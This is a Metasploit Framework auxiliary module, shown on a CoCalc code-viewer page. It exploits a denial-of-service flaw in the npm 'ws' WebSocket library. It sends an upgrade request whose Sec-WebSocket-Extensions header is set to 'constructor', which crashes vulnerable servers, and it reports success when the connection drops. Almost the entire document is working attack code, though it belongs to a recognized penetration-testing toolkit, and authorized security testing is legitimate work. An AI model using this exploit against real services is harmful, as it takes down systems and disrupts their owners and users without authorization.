Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/http/ws_dos.rb
19813 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize

11
    super(

12
      'Name' => 'ws - Denial of Service',

13
      'Description' => %q{

14
          This module exploits a Denial of Service vulnerability in npm module "ws".

15
        By sending a specially crafted value of the Sec-WebSocket-Extensions header on the initial WebSocket upgrade request, the ws component will crash.

16
      },

17
      'References' => [

18
        ['URL', 'https://nodesecurity.io/advisories/550'],

19
        ['CWE', '400'],

20
      ],

21
      'Author' => [

22
        'Ryan Knell,  Sonatype Security Research',

23
        'Nick Starke, Sonatype Security Research',

24
      ],

25
      'License' => MSF_LICENSE,

26
      'Notes' => {

27
        'Stability' => [CRASH_SERVICE_DOWN],

28
        'SideEffects' => [],

29
        'Reliability' => []

30
      }

31
    )

32


33
    register_options([

34
      Opt::RPORT(3000),

35
      OptString.new('TARGETURI', [true, 'The base path', '/']),

36
    ])

37
  end

38


39
  def run

40
    path = datastore['TARGETURI']

41


42
    # Create HTTP request

43
    req = [

44
      "GET #{path} HTTP/1.1",

45
      'Connection: Upgrade',

46
      "Sec-WebSocket-Key: #{Rex::Text.rand_text_alpha(5..14)}",

47
      'Sec-WebSocket-Version: 8',

48
      'Sec-WebSocket-Extensions: constructor', # Adding "constructor" as the value for this header causes the DoS

49
      'Upgrade: websocket',

50
      "\r\n"

51
    ].join("\r\n")

52


53
    begin

54
      connect

55
      print_status("Sending DoS packet to #{peer}")

56
      sock.put(req)

57


58
      data = sock.get_once(-1) # Attempt to retrieve data from the socket

59


60
      if data =~ /101/ # This is the expected HTTP status code. IF it's present, we have a valid upgrade response.

61
        print_error('WebSocket Upgrade request Successful, service not vulnerable.')

62
      else

63
        fail_with(Failure::Unknown, 'An unknown error occurred')

64
      end

65


66
      disconnect

67
      print_error('DoS packet unsuccessful')

68
    rescue ::Rex::ConnectionRefused

69
      print_error("Unable to connect to #{peer}")

70
    rescue ::Errno::ECONNRESET, ::EOFError

71
      print_good("DoS packet successful. #{peer} not responding.")

72
    end

73
  end

74
end

75


76